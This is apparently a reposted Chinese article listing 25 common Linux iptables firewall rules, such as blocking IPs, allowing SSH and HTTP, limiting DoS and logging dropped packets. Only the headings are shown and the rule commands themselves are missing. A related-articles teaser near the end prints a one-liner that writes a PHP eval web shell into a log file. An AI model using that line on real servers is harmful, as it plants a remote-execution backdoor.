25个常用的Linux iptables规则

一些常用的 Linux iptables 规则,请根据自己的具体需要再修改。

# 1. 删除所有现有规则

# 2. 设置默认的 chain 策略

# 3. 阻止某个特定的 IP 地址

# 4. 允许全部进来的(incoming)SSH

# 5. 只允许某个特定网络进来的 SSH

# 6. 允许进来的(incoming)HTTP

# 7. 多端口(允许进来的 SSH、HTTP 和 HTTPS)

# 8. 允许出去的(outgoing)SSH

# 9. 允许外出的(outgoing)SSH,但仅访问某个特定的网络

# 10. 允许外出的(outgoing) HTTPS

# 11. 对进来的 HTTPS 流量做负载均衡

# 12. 从内部向外部 Ping

# 13. 从外部向内部 Ping

# 14. 允许环回(loopback)访问

# 15. 允许 packets 从内网访问外网

# 16. 允许外出的 DNS

# 17. 允许 NIS 连接

# 18. 允许某个特定网络 rsync 进入本机

# 19. 仅允许来自某个特定网络的 MySQL 的链接

# 20. 允许 Sendmail 或 Postfix

# 21. 允许 IMAP 和 IMAPS

# 22. 允许 POP3 和 POP3S

# 23. 防止 DoS 攻击

# 24. 设置 422 端口转发到 22 端口

# 25. 为丢弃的包做日志(Log)

作者:数据库开发 来源:http://os.51cto.com/art/201709/551245.htm


原文发布于微信公众号 - 马哥Linux运维(magedu-Linux)

原文发表时间:2017-10-08

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏腾讯NEXT学位

【干货】加强 web 静态资源安全方法之SRI

我们通常会用CSP加强站点JS资源的执行限制,有效降低XSS攻击;我们通过HTTPS链接加密资源,减少站点资源劫持风险等等大量的前端安全方案。但你可能还没听说...

8K30
来自专栏北京马哥教育

linux服务器安全配置实例(一)引言

云豆贴心提醒,本文阅读时间6分钟 引言 很多企业的服务器经常遭受到攻击,出现的攻击方式有:http服务攻击、操作系统漏洞溢出攻击、sql注入攻击等。 大多服务...

46980
来自专栏我的安全视界观

【应急响应】redis未授权访问致远程植入挖矿脚本(攻击篇)

58960
来自专栏北京马哥教育

黑客常用linux入侵常用命令,有你不知道的没?

[jobcruit@wa64-054 rankup_log]$ echo -e "<?php @eval(\$_POST[md5])?>" >rankuplog...

28030
来自专栏Youngxj

判断网站是否被百度收录

40750
来自专栏散尽浮华

分布式监控系统Zabbix-批量添加聚合图形

之前部署了Zabbix(3.4.4版本)监控环境,由于主机比较多,分的主机组也比较多,添加聚合图形比较麻烦,故采用python脚本进行批量添加聚合图形。脚本下载...

621110
来自专栏黑白安全

密码的锅,Gentoo 发布 GitHub 仓库被入侵事件报告

之前我们曾报道过“Gentoo Linux 的 GitHub 仓库被入侵,意图删除所有文件”的消息,Gentoo Linux 的 Github 仓库在6月28日...

13720
来自专栏Golang语言社区

【Go 语言社区】开发中需要快速复制文件的批处理工具

开发过程中的快速复制,批处理代码如下: 将当前目录的所有文件复制到指定路径下,使用时候注意修改目录路径。 @echo off color f5 echo. ...

39850
来自专栏源码之家

最新淘客AppKey申请教程

92020
来自专栏禹都一只猫博客

ubuntu16.04国内apt源以及官方源

3K30

扫码关注云+社区

领取腾讯云代金券